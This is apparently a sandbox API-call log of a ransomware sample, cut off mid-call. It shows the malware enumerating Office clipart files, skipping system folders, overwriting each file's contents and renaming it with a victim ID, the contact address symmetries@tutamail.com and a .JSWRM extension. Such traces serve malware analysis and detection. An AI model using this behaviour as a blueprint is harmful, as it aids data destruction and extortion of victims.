[0083.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0083.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0083.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0083.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0083.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0083.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0083.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149018.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149018.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0083.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0083.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0083.212] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe81b154, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfd22, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0149118.JPG", cAlternateFileName="")) returned 1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2=".") returned 1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="..") returned 1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="...") returned 1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="windows") returned -1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="recovery") returned -1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="perflogs") returned -1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="documents and settings") returned 1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="$RECYCLE.BIN") returned 1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="system volume information") returned -1 [0083.212] lstrcmpiW (lpString1="J0149118.JPG", lpString2="msocache") returned -1 [0083.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0083.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0149118.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0149118.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0149118.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0083.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0083.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0149118.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0149118.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0149118.JPG", lpUsedDefaultChar=0x0) returned 12 [0083.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0083.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0083.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0083.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0083.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.213] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=64802) returned 1 [0083.213] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfd20) returned 0x24d210 [0083.214] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xfd20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xfd20, lpOverlapped=0x0) returned 1 [0083.261] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.261] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xfd20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xfd20, lpOverlapped=0x0) returned 1 [0083.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.263] CloseHandle (hObject=0x314) returned 1 [0083.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0083.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0083.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0083.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0083.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0083.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0083.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0083.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0083.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.263] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0149118.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0149118.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0083.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0083.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0083.264] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe81b154, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb544, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0150150.WMF", cAlternateFileName="")) returned 1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2=".") returned 1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="..") returned 1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="...") returned 1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="windows") returned -1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="recovery") returned -1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="perflogs") returned -1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="documents and settings") returned 1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="system volume information") returned -1 [0083.264] lstrcmpiW (lpString1="J0150150.WMF", lpString2="msocache") returned -1 [0083.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0083.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0150150.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0150150.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0150150.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0083.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0083.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0150150.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0150150.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0150150.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0083.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0083.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0083.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0083.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.265] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46404) returned 1 [0083.265] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb540) returned 0x24d210 [0083.266] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb540, lpOverlapped=0x0) returned 1 [0083.316] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.316] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb540, lpOverlapped=0x0) returned 1 [0083.316] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0083.317] CloseHandle (hObject=0x314) returned 1 [0083.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0083.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0083.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.317] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0083.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.317] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0083.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0083.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0083.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0083.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0083.318] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150150.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150150.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0083.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0083.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0083.319] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7cecf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7cecf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7f4eef, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x212e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0150861.WMF", cAlternateFileName="")) returned 1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2=".") returned 1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="..") returned 1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="...") returned 1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="windows") returned -1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="recovery") returned -1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="perflogs") returned -1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="documents and settings") returned 1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="$RECYCLE.BIN") returned 1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="system volume information") returned -1 [0083.319] lstrcmpiW (lpString1="J0150861.WMF", lpString2="msocache") returned -1 [0083.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0083.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0150861.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0150861.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0150861.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0083.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0083.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0150861.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0150861.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0150861.WMF", lpUsedDefaultChar=0x0) returned 12 [0083.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0083.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0083.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0083.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0083.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0083.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0083.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0083.320] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8494) returned 1 [0083.320] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2120) returned 0x205850 [0083.320] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2120, lpOverlapped=0x0) returned 1 [0083.322] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.322] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2120, lpOverlapped=0x0) returned 1 [0083.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0083.323] CloseHandle (hObject=0x314) returned 1 [0083.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0083.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0083.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0083.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0083.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0083.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0083.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0083.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0083.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0083.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0083.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0083.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0083.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0083.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0083.323] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0150861.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0150861.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0083.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0083.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0083.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0083.324] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe84140d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe84140d, 